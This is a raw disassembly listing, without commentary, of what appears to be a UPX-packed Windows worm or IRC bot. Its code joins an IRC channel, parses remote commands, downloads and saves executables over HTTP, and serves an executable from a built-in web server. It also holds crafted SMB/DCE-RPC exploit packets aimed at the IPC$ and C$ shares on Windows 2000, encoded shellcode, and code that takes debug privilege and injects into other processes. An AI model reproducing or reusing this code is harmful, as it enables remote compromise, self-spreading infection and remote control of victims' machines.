var_24 = qword ptr -24h
var_1C = word ptr -1Ch
var_1A = word ptr -1Ah
var_16 = word ptr -16h
var_C = qword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 1Ch
lea eax, [ebp+var_1C]
push eax
call dword_31501050
movzx eax, [ebp+var_1A]
mov [ebp+var_4], eax
push ecx
fild [ebp+var_4]
push ecx
fstp [esp+24h+var_24]
call sub_31503AAA
movzx eax, [ebp+var_16]
fstp [ebp+var_C]
mov [ebp+var_4], eax
fild [ebp+var_4]
fstp [esp+24h+var_24]
call sub_31503AA4
movzx eax, [ebp+var_1C]
fmul [ebp+var_C]
lea eax, [eax+eax*2]
fstp [ebp+var_C]
mov [ebp+var_4], eax
fild [ebp+var_4]
fstp [esp+24h+var_24]
call sub_31503A9E
fadd [ebp+var_C]
fstp [ebp+var_C]
push dword ptr [ebp+var_C]
call dword_31501128
mov eax, [ebp+arg_0]
push 7
mov byte ptr [eax], 23h
inc eax
push eax
call sub_31501932
push 8
push [ebp+arg_4]
call sub_31501932
add esp, 1Ch
call dword_31501124
push 1Ah
cdq
pop ecx
idiv ecx
mov eax, [ebp+arg_8]
mov [eax], edx
call sub_315018BA
leave
retn
sub_31503371 endp
; ---------------------------------------------------------------------------
loc_31503408: ; DATA XREF: sub_31501D96+140�o
mov eax, offset loc_31503ADB
call sub_31503A98
sub esp, 2E8h
push ebx
push esi
xor ebx, ebx
push edi
mov ds:dword_315061A4, ebx
call sub_315018BA
mov esi, dword_31501124
call esi
push 4
cdq
pop ecx
idiv ecx
lea eax, [ebp-4Ch]
add edx, ecx
push edx
push eax
call sub_31501932
cmp ds:dword_315061A0, ebx
mov edi, dword_3150106C
pop ecx
pop ecx
jz short loc_3150345D
lea eax, [ebp-4Ch]
push offset a_ ; "_"
push eax
call edi
loc_3150345D: ; CODE XREF: UPX0:31503450�j
lea eax, [ebp-4Ch]
push offset a13 ; "13"
push eax
call edi
lea ecx, [ebp-2F4h]
call sub_31502DA1
mov [ebp-4], ebx
loc_31503476: ; CODE XREF: UPX0:315035DD�j
; UPX0:31503603�j
push offset dword_315061A8
lea eax, [ebp-18h]
push offset dword_315061AC
push eax
call sub_31503371
add esp, 0Ch
loc_3150348C: ; CODE XREF: UPX0:315034A0�j
call sub_31501A32
test eax, eax
jnz short loc_315034A2
push 3E8h
call dword_315010A4
jmp short loc_3150348C
; ---------------------------------------------------------------------------
loc_315034A2: ; CODE XREF: UPX0:31503493�j
xor ebx, ebx
call esi
push 7
cdq
pop ecx
idiv ecx
lea eax, [ebp-6Ch]
add edx, 5
push edx
push eax
call sub_31501932
pop ecx
xor edi, edi
pop ecx
loc_315034BD: ; CODE XREF: UPX0:315034F9�j
push 1A0Bh
lea ecx, [ebp-2F4h]
push off_31505E14
call sub_31502DB6
lea eax, [ebp-6Ch]
push eax
lea eax, [ebp-4Ch]
push eax
call dword_315010A0
push eax
lea eax, [ebp-4Ch]
push eax
lea ecx, [ebp-2F4h]
call sub_31502DEC
test eax, eax
jz short loc_31503550
inc edi
cmp edi, 8
jl short loc_315034BD
xor edi, edi
loc_315034FD: ; CODE XREF: UPX0:3150354C�j
call sub_31501A32
test eax, eax
jz short loc_3150355E
push 1A0Bh
call esi
push 13h
xor edx, edx
pop ecx
div ecx
lea ecx, [ebp-2F4h]
push off_31505E14[edx*4]
call sub_31502DB6
lea eax, [ebp-6Ch]
push eax
lea eax, [ebp-4Ch]
push eax
call dword_315010A0
push eax
lea eax, [ebp-4Ch]
push eax
lea ecx, [ebp-2F4h]
call sub_31502DEC
test eax, eax
jz short loc_3150355B
inc edi
cmp edi, 4Ch
jb short loc_315034FD
jmp short loc_3150355E
; ---------------------------------------------------------------------------
loc_31503550: ; CODE XREF: UPX0:315034F3�j
push 1
pop ebx
mov ds:dword_315061A4, ebx
jmp short loc_31503567
; ---------------------------------------------------------------------------
loc_3150355B: ; CODE XREF: UPX0:31503546�j
push 1
pop ebx
loc_3150355E: ; CODE XREF: UPX0:31503504�j
; UPX0:3150354E�j
cmp ds:dword_315061A4, 0
jz short loc_31503576
loc_31503567: ; CODE XREF: UPX0:31503559�j
lea eax, [ebp-18h]
push offset aTaty ; "#taty"
push eax
call dword_31501088
loc_31503576: ; CODE XREF: UPX0:31503565�j
test ebx, ebx
jz short loc_315035EE
call sub_31501A32
test eax, eax
jz short loc_315035EE
loc_31503583: ; CODE XREF: UPX0:315035A8�j
lea eax, [ebp-18h]
lea ecx, [ebp-2F4h]
push eax
call sub_315030B1
test eax, eax
jz short loc_315035AA
push 3E8h
call dword_315010A4
call sub_31501A32
test eax, eax
jnz short loc_31503583
loc_315035AA: ; CODE XREF: UPX0:31503594�j
cmp ds:dword_315061A4, 0
jz short loc_315035BA
mov edx, 0A8C0h
jmp short loc_315035CA
; ---------------------------------------------------------------------------
loc_315035BA: ; CODE XREF: UPX0:315035B1�j
call esi
cdq
mov ecx, 1F4h
idiv ecx
add edx, 578h
loc_315035CA: ; CODE XREF: UPX0:315035B8�j
push edx
lea ecx, [ebp-2F4h]
call sub_315031EC
call sub_31501A32
test eax, eax
jz loc_31503476
lea ecx, [ebp-2F4h]
call sub_31503183
loc_315035EE: ; CODE XREF: UPX0:31503578�j
; UPX0:31503581�j
call esi
push 0Ah
cdq
pop ecx
idiv ecx
imul edx, 0EA60h
push edx
call dword_315010A4
jmp loc_31503476
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31503608 proc near ; CODE XREF: sub_31503722+5E�p
var_110 = byte ptr -110h
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 110h
push ebx
push esi
xor esi, esi
push edi
push esi
push esi
push esi
push 1
push offset aMozilla4_0Comp ; "Mozilla/4.0 (compatible; MSIE 6.0; Wind"...
call dword_31501154
mov ebx, eax
cmp ebx, esi
jnz short loc_31503633
push 1
jmp loc_315036C9
; ---------------------------------------------------------------------------
loc_31503633: ; CODE XREF: sub_31503608+22�j
lea eax, [ebp+var_110]
push 104h
push eax
call dword_31501068
mov edi, dword_3150106C
lea eax, [ebp+var_110]
push offset asc_31505CF0 ; "\\"
push eax
call edi
lea eax, [ebp+var_110]
push 6
push eax
call dword_315010A0
lea eax, [ebp+eax+var_110]
push eax
call sub_31501932
pop ecx
lea eax, [ebp+var_110]
pop ecx
push offset a_exe ; ".exe"
push eax
call edi
push esi
push esi
push 2
push esi
push esi
lea eax, [ebp+var_110]
push 40000000h
push eax
call dword_315010F0
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jnz short loc_315036A9
push 2
jmp short loc_315036C9
; ---------------------------------------------------------------------------
loc_315036A9: ; CODE XREF: sub_31503608+9B�j
push esi
push esi
push esi
push esi
push [ebp+arg_0]
push ebx
call dword_31501150
cmp eax, esi
mov [ebp+arg_0], eax
jnz short loc_315036CC
push [ebp+var_4]
call dword_315010BC
push 3
loc_315036C9: ; CODE XREF: sub_31503608+26�j
; sub_31503608+9F�j
pop eax
jmp short loc_3150371D
; ---------------------------------------------------------------------------
loc_315036CC: ; CODE XREF: sub_31503608+B4�j
mov edi, 100000h
push edi
call sub_31502800
mov ebx, eax
pop ecx
lea eax, [ebp+var_8]
push eax
push edi
push ebx
push [ebp+arg_0]
call dword_31501158
lea eax, [ebp+var_C]
push esi
push eax
push [ebp+var_8]
push ebx
push [ebp+var_4]
call dword_3150104C
push [ebp+var_4]
call dword_315010BC
lea eax, [ebp+var_110]
push 5
push eax
call sub_31501962
push ebx
call sub_31502814
add esp, 0Ch
xor eax, eax
loc_3150371D: ; CODE XREF: sub_31503608+C2�j
pop edi
pop esi
pop ebx
leave
retn
sub_31503608 endp
; =============== S U B R O U T I N E =======================================
sub_31503722 proc near ; CODE XREF: sub_315031EC+D1�p
var_2CC = dword ptr -2CCh
var_2C8 = byte ptr -2C8h
var_264 = byte ptr -264h
var_200 = byte ptr -200h
var_100 = byte ptr -100h
var_FF = byte ptr -0FFh
arg_0 = dword ptr 4
sub esp, 2CCh
push ebx
push ebp
push esi
push edi
push offset dword_315061AC
mov esi, ecx
push [esp+2E0h+arg_0]
call dword_31501120
mov edi, dword_315010C8
pop ecx
mov ebx, eax
pop ecx
mov [esp+2DCh+var_2CC], ebx
call edi
sub eax, [esi+70h]
cmp eax, 927C0h
jbe short loc_31503761
and dword ptr [esi+284h], 0
loc_31503761: ; CODE XREF: sub_31503722+36�j
cmp dword ptr [esi+7Ch], 0
jz short loc_315037C3
call edi
mov ecx, [esi+78h]
sub eax, [esi+74h]
imul ecx, 3E8h
cmp eax, ecx
jbe short loc_315037C3
lea eax, [esi+180h]
push eax
call sub_31503608
test eax, eax
pop ecx
jnz short loc_315037C3
call edi
push dword ptr [esi+78h]
and dword ptr [esi+7Ch], 0
mov [esi+70h], eax
lea eax, [esp+2E0h+var_2C8]
push offset a1D ; "-1,%d"
push eax
mov dword ptr [esi+284h], 1
call dword_3150113C
add esp, 0Ch
lea eax, [esp+2DCh+var_2C8]
mov ecx, esi
push eax
lea eax, [esi+30h]
push eax
call sub_315032FA
loc_315037C3: ; CODE XREF: sub_31503722+43�j
; sub_31503722+55�j ...
test ebx, ebx
jz loc_31503A01
push ebx
call dword_315010A0
cmp eax, 0Ah
jle loc_31503A01
mov ebp, dword_31501110
add ebx, 8
push 7Ch
push ebx
call ebp
mov edi, eax
pop ecx
test edi, edi
pop ecx
jz loc_31503A01
and byte ptr [edi], 0
push ebx
call dword_315010A0
cmp eax, 100h
jge loc_31503A28
push ds:dword_315061A8
lea eax, [esp+2E0h+var_200]
push ebx
push eax
call sub_31502D3C
lea ebx, [edi+1]
push 7Ch
push ebx
mov byte ptr [edi], 7Ch
call ebp
mov edi, eax
add esp, 14h
test edi, edi
jz loc_31503A01
and byte ptr [edi], 0
push ebx
call dword_315010A0
cmp eax, 100h
jge loc_31503A28
push ds:dword_315061A8
lea eax, [esi+180h]
push ebx
push eax
call sub_31502D3C
add esp, 0Ch
lea eax, [esp+2DCh+var_200]
push offset aE ; "e"
push eax
call dword_31501040
mov ebx, dword_31501088
test eax, eax
jnz loc_31503968
lea eax, [esi+180h]
push eax
call dword_315010A0
cmp eax, 0FFh
jge loc_31503968
cmp dword ptr [esi+284h], 0
jnz loc_31503968
cmp dword ptr [esi+7Ch], 0
jnz loc_31503968
lea eax, [edi+1]
push 7Ch
push eax
call ebp
mov ebp, eax
pop ecx
test ebp, ebp
pop ecx
jz loc_31503949
and byte ptr [ebp+0], 0
lea eax, [edi+1]
push eax
call dword_315010A0
cmp eax, 100h
jge loc_31503A28
lea eax, [edi+1]
push eax
lea eax, [esp+2E0h+var_100]
push eax
call ebx
push [esp+2DCh+var_2CC]
lea eax, [esi+80h]
mov byte ptr [edi], 7Ch
push eax
call ebx
mov byte ptr [ebp+0], 7Ch
and byte ptr [edi], 0
cmp [esp+2DCh+var_100], 65h
jle short loc_31503956
lea eax, [esp+2DCh+var_FF]
push eax
call dword_315010F8
mov ebp, eax
pop ecx
test ebp, ebp
jz short loc_31503956
cmp ebp, 0E10h
jnb short loc_31503956
call dword_31501124
xor edx, edx
mov dword ptr [esi+7Ch], 1
div ebp
mov [esi+78h], edx
call dword_315010C8
mov [esi+74h], eax
jmp short loc_31503956
; ---------------------------------------------------------------------------
loc_31503949: ; CODE XREF: sub_31503722+19D�j
push [esp+2DCh+var_2CC]
lea eax, [esi+80h]
push eax
call ebx
loc_31503956: ; CODE XREF: sub_31503722+1E9�j
; sub_31503722+1FE�j ...
lea eax, [esi+80h]
push offset asc_31506124 ; "|"
push eax
call dword_3150106C
loc_31503968: ; CODE XREF: sub_31503722+15A�j
; sub_31503722+172�j ...
mov ebp, dword_31501040
lea eax, [esp+2DCh+var_200]
push offset aI ; "i"
push eax
call ebp
test eax, eax
jnz short loc_315039DE
lea eax, [esp+2DCh+var_2C8]
push offset dword_315061CC
push eax
call ebx
lea eax, [esp+2DCh+var_2C8]
push 63h
push eax
push 7
push 400h
call dword_31501040+4
push ds:dword_31506198
lea eax, [esp+2E0h+var_2C8]
push eax
lea eax, [esp+2E4h+var_264]
push ds:dword_31506194
push ds:dword_3150615C
push offset aDD13SD ; "%d,%d,13%s,%d"
push eax
call dword_3150113C
add esp, 18h
lea eax, [esp+2DCh+var_264]
mov ecx, esi
push eax
lea eax, [esi+30h]
push eax
call sub_315032FA
loc_315039DE: ; CODE XREF: sub_31503722+25D�j
lea eax, [esp+2DCh+var_200]
push offset aQ ; "q"
push eax
call ebp
test eax, eax
jnz short loc_315039FE
cmp [esi+284h], eax
jz short loc_315039FE
push 1
pop eax
jmp short loc_31503A2A
; ---------------------------------------------------------------------------
loc_315039FE: ; CODE XREF: sub_31503722+2CD�j
; sub_31503722+2D5�j
mov byte ptr [edi], 7Ch
loc_31503A01: ; CODE XREF: sub_31503722+A3�j
; sub_31503722+B3�j ...
cmp dword ptr [esi+284h], 0
jz short loc_31503A28
push offset aJoin ; "JOIN"
push [esp+2E0h+arg_0]
call dword_31501120
pop ecx
test eax, eax
pop ecx
jz short loc_31503A28
call dword_31501124
loc_31503A28: ; CODE XREF: sub_31503722+E2�j
; sub_31503722+123�j ...
xor eax, eax
loc_31503A2A: ; CODE XREF: sub_31503722+2DA�j
pop edi
pop esi
pop ebp
pop ebx
add esp, 2CCh
retn 4
sub_31503722 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31503A38 proc near ; CODE XREF: sub_315011C0+128�p
; sub_315011C0+134�p ...
jmp dword_31501134
sub_31503A38 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31503A3E proc near ; CODE XREF: sub_315011C0+9C�p
; sub_315011C0+C5�p ...
jmp dword_31501130
sub_31503A3E endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31503A44 proc near ; CODE XREF: sub_315011C0+93�p
; sub_315011C0+B2�p ...
jmp dword_3150112C
sub_31503A44 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_31503A50 proc near ; CODE XREF: sub_315011C0+8�p
arg_0 = byte ptr 4
push ecx
cmp eax, 1000h
lea ecx, [esp+4+arg_0]
jb short loc_31503A70
loc_31503A5C: ; CODE XREF: sub_31503A50+1E�j
sub ecx, 1000h
sub eax, 1000h
test [ecx], eax
cmp eax, 1000h
jnb short loc_31503A5C
loc_31503A70: ; CODE XREF: sub_31503A50+A�j
sub ecx, eax
mov eax, esp
test [ecx], eax
mov esp, ecx
mov ecx, [eax]
mov eax, [eax+4]
push eax
retn
sub_31503A50 endp
; ---------------------------------------------------------------------------
align 10h
loc_31503A80: ; DATA XREF: sub_31501D96+A�o
jmp dword ptr loc_3150111C
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31503A86 proc near ; CODE XREF: sub_31501F6B+10C�p
; sub_31501F6B+119�p ...
jmp dword_31501118
sub_31503A86 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31503A8C proc near ; CODE XREF: sub_31501F6B+35�p
jmp dword_31501114
sub_31503A8C endp
; ---------------------------------------------------------------------------
loc_31503A92: ; CODE XREF: UPX0:31503AC9�j
; UPX0:31503AE0�j
jmp dword ptr locret_3150110A+2
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31503A98 proc near ; CODE XREF: sub_315031EC+5�p
; UPX0:3150340D�p
jmp dword ptr loc_31501108
sub_31503A98 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31503A9E proc near ; CODE XREF: sub_31503371+4F�p
jmp dword_31501104
sub_31503A9E endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31503AA4 proc near ; CODE XREF: sub_31503371+34�p
jmp dword_31501100
sub_31503AA4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31503AAA proc near ; CODE XREF: sub_31503371+1F�p
jmp dword_315010FC
sub_31503AAA endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31503AB0 proc near ; CODE XREF: sub_31502490+AB�p
jmp dword_31501084
sub_31503AB0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31503AB6 proc near ; CODE XREF: sub_31502490+64�p
jmp dword_3150107C
sub_31503AB6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31503ABC proc near ; CODE XREF: sub_31502490+2D�p
jmp dword_31501078
sub_31503ABC endp
; ---------------------------------------------------------------------------
align 4
loc_31503AC4: ; DATA XREF: sub_315031EC�o
mov eax, offset dword_31503AE8
jmp loc_31503A92
; ---------------------------------------------------------------------------
align 10h
lea ecx, [ebp-2F4h]
jmp loc_31502DD4
; ---------------------------------------------------------------------------
loc_31503ADB: ; DATA XREF: UPX0:loc_31503408�o
mov eax, offset dword_31503B40
jmp loc_31503A92
; ---------------------------------------------------------------------------
align 4
dword_31503AE8 dd 19930520h, 2, 31503B08h, 1, 31503B18h, 3 dup(0)
; DATA XREF: UPX0:loc_31503AC4�o
dd 0FFFFFFFFh, 0
dd 0FFFFFFFFh, 3 dup(0)
dd 2 dup(1), 31503B30h, 4 dup(0)
dd offset loc_315032E0
dword_31503B40 dd 19930520h, 1, 31503B60h, 5 dup(0) ; DATA XREF: UPX0:loc_31503ADB�o
dd 0FFFFFFFFh, 31503AD0h, 526h dup(0)
byte_31505000 db 0EBh ; DATA XREF: sub_315011C0+24E�o
; sub_315011C0+260�o ...
db 58h
word_31505002 dw 7468h ; DATA XREF: sub_31502277+40�o
dd 2F3A7074h, 3732312Fh, 302E302Eh, 383A312Eh, 652F3030h
dd 6578652Eh, 4 dup(0DFDFDFDFh), 7A6F4DDFh, 616C6C69h
dd 302E342Fh, 0C9335DDFh, 1F1B966h, 8B05758Dh, 3C068AFEh
dd 46057599h, 302C068Ah, 88993446h, 0EDE24707h, 0DAE80AEBh
dd 2EFFFFFFh, 2E676562h, 0C9999371h, 0C999C999h, 91BDFD12h
dd 0C99916FDh, 0AA6872C1h, 0AA66FD42h, 14BA10FDh, 9998A91Ch
dd 0C9C999C9h, 98F198F3h, 9986C999h, 98C571C9h, 0C999C999h
dd 37CB5F90h, 1C965992h, 99C99978h, 14C999C9h, 7D7157E4h
dd 0C999C999h, 0E414C999h, 9945713Ah, 99C999C9h, 0F19DF3C9h
dd 9989C999h, 0F1C999C9h, 0C999C999h, 0F3C9999Ch, 0B471C999h
dd 99C99998h, 0E3F367C9h, 0D11C10F0h, 99C99998h, 0C959B2C9h
dd 0C99BF3C9h, 0C999F1C9h, 0C999C999h, 0A20414D9h, 99C99998h
dd 9371CAC9h, 99C99998h, 61688DC9h, 0AE1C1091h, 99C99998h
dd 66611AC9h, 99111D96h, 99C999C9h, 0C850B2C9h, 98F3C8C8h
dd 0C957DC14h, 0C9992671h, 0C999C999h, 91C0A44Eh, 59924912h
dd 59B2F7EDh, 0C9C9C9C9h, 0CA3AC414h, 993C71CBh, 99C999C9h
dd 0E424FFC9h, 0ED599221h, 0F1CDCDCFh, 0C999C999h, 66C9999Ch
dd 9998D12Ch, 0C9C999C9h, 0C9991371h, 0C999C999h, 83B8B0FBh
dd 5D12CDC3h, 0C9C999F3h, 0D12C66CBh, 99C99998h, 0AE2C66C9h
dd 99C99998h, 990C71C9h, 99C999C9h, 0A6485AC9h, 2C66C096h
dd 0C99998AEh, 1C71C999h, 0C999C999h, 294CC999h, 9CF3EBA7h
dd 98A20414h, 0C999C999h, 99EA71CAh, 99C999C9h, 26F434C9h
dd 0C999F371h, 0C999F171h, 0C999C999h, 0EF133BF9h, 376B4629h
dd 9966DE5Fh, 0A8EC5AC9h, 0F0ABB7AAh, 2 dup(0C999C999h)
dd 0C5B7C999h, 0ECE9EDFFh, 0FCB7FDE9h, 0C999FCE1h, 6 dup(0C999C999h)
dd 0FCFCF5CAh, 0F2C999E9h, 0FCF7EBFCh, 99ABAAF5h, 0F934C7C9h
dd 25B459AAh, 0C9662A2Ah, 819093ACh, 909CC9B7h, 0C983639Dh
dd 999271CDh, 99C999C9h, 3519BFC9h, 0BDFD1451h, 91720A95h
dd 71F934C7h, 99C999C8h, 12C999C9h, 0D512A5D2h, 529AE180h
dd 8D146FAAh, 0B9C89A2Ah, 4A9A8B12h, 595859AAh, 0DB9BAB9Eh
dd 0C999A319h, 0DDA26CECh, 9EED85BDh, 81E8A2DFh, 125544EBh
dd 4A9ABDC8h, 0EB8D2E96h, 9A85D812h, 99D125Ah, 0DD105A9Ah
dd 10F885BDh, 9998D51Ch, 66C999C9h, 0FD7F6649h, 0A98712FEh
dd 0C212C999h, 85C21295h, 0C2128212h, 0FCB75A91h, 0B7FDF7h
dword_315052C8 dd 85000000h, 424D53FFh, 72h, 0C8531800h, 3 dup(0)
; DATA XREF: sub_315011C0+186�o
dd 0FEFF0000h, 0
dd 2006200h
aPcNetworkProgr db 'PC NETWORK PROGRAM 1.0',0
db 2
db 4Ch ; L
db 41h, 4Eh, 4Dh
db 41h ; A
db 4Eh, 31h, 2Eh
db 30h ; 0
align 2
dw 5702h
aIndowsForWorkg db 'indows for Workgroups 3.1a',0
db 2
dd 2E314D4Ch, 30305832h, 4C020032h, 414D4E41h, 312E324Eh
dd 544E0200h, 204D4C20h, 32312E30h, 0
dword_31505354 dd 0A4000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_315011C0+1BA�o
dd 0FEFF0000h, 100000h, 0A400FF0Ch, 0A110400h, 0
dd 20000000h, 0
dd 0D400h, 4E006980h, 534D4C54h, 1005053h, 97000000h, 0E00882h
dd 4 dup(0)
aWindows2000219:
unicode 0, <Windows 2000 2195>,0
aWindows20005_0:
unicode 0, <Windows 2000 5.0>,0
align 10h
dword_31505400 dd 0DA000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_315011C0+1EE�o
dd 0FEFF0000h, 200800h, 0DA00FF0Ch, 0A110400h, 0
dd 57000000h, 0
dd 0D400h, 4E009F80h, 534D4C54h, 3005053h, 1000000h, 46000100h
dd 0
dd 47000000h, 0
dd 40000000h, 0
dd 40000000h, 6000000h, 40000600h, 10000000h, 47001000h
dd 15000000h, 48E0888Ah, 44004F00h, 19810000h, 0E4F27A6Ah
dd 0AF281C49h, 10742530h, 575367h, 6E0069h, 6F0064h, 730077h
dd 320020h, 300030h, 200030h, 310032h, 350039h, 570000h
dd 6E0069h, 6F0064h, 730077h, 320020h, 300030h, 200030h
dd 2E0035h, 30h, 0
dword_315054E0 dd 5C000000h, 424D53FFh, 75h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_315011C0+8D�o
dd 0FEFF0000h, 300800h, 5C00FF04h, 1000800h, 3100h, 5C005Ch
dd 390031h, 2E0032h, 360031h, 2E0038h, 2E0031h, 310032h
dd 5C0030h, 500049h
aC: ; DATA XREF: sub_315011C0+BF�o
unicode 0, <C$>,0
a????? db '?????',0
dd 0
dword_31505544 dd 64000000h, 424D53FFh, 0A2h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_315011C0+2D4�o
dd 4DC0800h, 400800h, 0DE00FF18h, 0E00DEh, 16h, 0
dd 2019Fh, 3 dup(0)
dd 3, 1, 40h, 2, 1103h, 6C005Ch, 610073h, 700072h, 63h
dd 0
dword_315055B0 dd 9C000000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_315011C0+308�o
dd 4DC0800h, 500800h, 48000010h, 0
dd 4, 2 dup(0)
dd 48005400h, 2005400h, 2600h, 10005940h, 50005Ch, 500049h
dd 5C0045h, 0
dd 30B0005h, 10h, 48h, 1, 10B810B8h, 0
dd 1, 10000h, 3919286Ah, 11D0B10Ch, 0C000A89Bh, 0F52ED94Fh
dd 0
dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dword_31505654 dd 0F40C0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_315011C0+4EE�o
dd 4DC0800h, 600800h, 0A0000010h, 0Ch, 4, 2 dup(0)
dd 0A0005400h, 200540Ch, 2600h, 100CB140h, 50005Ch, 500049h
dd 5C0045h, 0
dd 3000005h, 10h, 0CA0h, 1, 0C88h, 90000h, 3ECh, 0
dd 3ECh, 0
dword_315056D4 dd 401495h, 3, 40707Ch, 1, 0 ; DATA XREF: sub_315011C0+51C�o
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 40707Ch, 1, 0
dd 1, 0
dd 40707Ch, 1, 0
dd 1, 0
dd 40707Ch, 1, 0
dd 1, 0
dd 138578h, 0E9A65BABh, 0
dword_31505768 dd 0F8100000h, 424D53FFh, 2Fh, 0C8071800h, 3 dup(0)
; DATA XREF: sub_315011C0+347�o
dd 0FEFF0800h, 600800h, 0DE00FF0Eh, 4000DEh, 0FF000000h
dd 8FFFFFFh, 10B800h, 4010B800h, 0
dd 0EE10B900h, 1000005h, 10h, 10B8h, 1, 200Ch, 90000h
dd 0DADh, 0
dd 0DADh, 0
dword_315057D4 dd 0D80F0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_315011C0+372�o
dd 1180800h, 700800h, 84000010h, 0Fh, 4, 2 dup(0)
dd 84005400h, 200540Fh, 2600h, 0F9540h, 50005Ch, 500049h
dd 5C0045h, 0
dd 2000005h, 10h, 0F84h, 1, 0F6Ch, 90000h, 0
dword_31505848 dd 0 ; DATA XREF: sub_315011C0+3A0�o
dd 40A89Ah, 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 40A89Ah, 1, 0
dd 1, 0
dd 40A89Ah, 1, 0
dd 1, 0
dd 40A89Ah, 1, 0
dd 1, 3 dup(0)
dd 586E6957h, 72502050h, 6Fh, 9 dup(0)
db 2 dup(0)
dword_31505906 dd 1004600h ; DATA XREF: sub_315011C0+289�r
dw 1
dd 69570000h, 206B326Eh, 6F7250h, 0Ah dup(0)
dword_31505940 dd 7515123Ch, 2, 326E6957h, 5341206Bh, 0Ah dup(0)
; DATA XREF: sub_315011C0+41B�o
; sub_315011C0+45D�o
dd 123C0000h, 751Ch, 0Eh dup(0)
; ---------------------------------------------------------------------------
loc_315059B8: ; DATA XREF: sub_315011C0+44A�o
jmp short loc_315059C0
; ---------------------------------------------------------------------------
jmp short loc_315059C2
; ---------------------------------------------------------------------------
align 10h
loc_315059C0: ; CODE XREF: UPX0:loc_315059B8�j
; DATA XREF: sub_315011C0+5C�o
pop esp
pop esp
loc_315059C2: ; CODE XREF: UPX0:315059BA�j
and eax, 70695C73h
arpl [eax+eax], sp
; ---------------------------------------------------------------------------
dw 0
dword_315059CC dd 1CEC8166h ; DATA XREF: sub_315011C0+D�r
dword_315059D0 dd 0E4FF07h ; DATA XREF: sub_315011C0+1C�r
aSedebugprivile db 'SeDebugPrivilege',0 ; DATA XREF: sub_31501727+62�o
align 4
aAdjusttokenpri db 'AdjustTokenPrivileges',0 ; DATA XREF: sub_31501727+39�o
align 10h
aLookupprivileg db 'LookupPrivilegeValueA',0 ; DATA XREF: sub_31501727+2A�o
align 4
aOpenprocesstok db 'OpenProcessToken',0 ; DATA XREF: sub_31501727+1B�o
align 4
aAdvapi32 db 'advapi32',0 ; DATA XREF: sub_31501727+8�o
; sub_31501D96+102�o
align 4
aUterm13_2i db 'uterm13.2i',0 ; DATA XREF: sub_315017AF:loc_31501894�o
; UPX0:31501D35�o ...
align 4
aShell_traywnd db 'Shell_TrayWnd',0 ; DATA XREF: sub_315017AF+58�o
align 4
aCreateremoteth db 'CreateRemoteThread',0 ; DATA XREF: sub_315017AF:loc_315017F6�o
align 4
aVirtualallocex db 'VirtualAllocEx',0 ; DATA XREF: sub_315017AF+34�o
align 4
aKernel32 db 'kernel32',0 ; DATA XREF: sub_315017AF+18�o
align 4
dword_31505A84 dd 0E9F3F5h ; DATA XREF: sub_31501A62+112�o
aHttp1_1200Ok db 'HTTP/1.1 200 OK',0Dh,0Ah ; DATA XREF: sub_31501A62+106�o
db 0Dh,0Ah
db 0Dh,0Ah,0
align 10h
aContentLengthU db 'Content-Length: %u',0Dh,0Ah ; DATA XREF: sub_31501A62+85�o
db 0Dh,0Ah,0
align 4
aHttp1_1200OkCo db 'HTTP/1.1 200 OK',0Dh,0Ah ; DATA XREF: sub_31501A62+71�o
db 'Content-Type: application/x-exe-compressed',0Dh,0Ah,0
align 4
a_exe db '.exe',0 ; DATA XREF: sub_31501A62+55�o
; sub_315025F6+4B�o ...
align 10h
aGet db 'GET',0 ; DATA XREF: sub_31501A62+3D�o
aFtpupd_exe db 'ftpupd.exe',0 ; DATA XREF: UPX0:31501D20�o
align 10h
aUser32 db 'user32',0 ; DATA XREF: sub_31501D96+109�o
align 4
aMsvcrt db 'msvcrt',0 ; DATA XREF: sub_31501D96+FB�o
align 10h
aWininet db 'wininet',0 ; DATA XREF: sub_31501D96+F4�o
aWs2_32 db 'ws2_32',0 ; DATA XREF: sub_31501D96+E7�o
align 10h
aU14 db 'u14',0 ; DATA XREF: sub_31501D96+D5�o
aU13_2i db 'u13.2i',0 ; DATA XREF: sub_31501D96+C9�o
align 4
aU13i db 'u13i',0 ; DATA XREF: sub_31501D96+BD�o
align 4
aU13 db 'u13',0 ; DATA XREF: sub_31501D96+B1�o
aU12 db 'u12',0 ; DATA XREF: sub_31501D96+A5�o
aU11 db 'u11',0 ; DATA XREF: sub_31501D96+99�o
aU10 db 'u10',0 ; DATA XREF: sub_31501D96+8D�o
aU9 db 'u9',0 ; DATA XREF: sub_31501D96+81�o
align 4
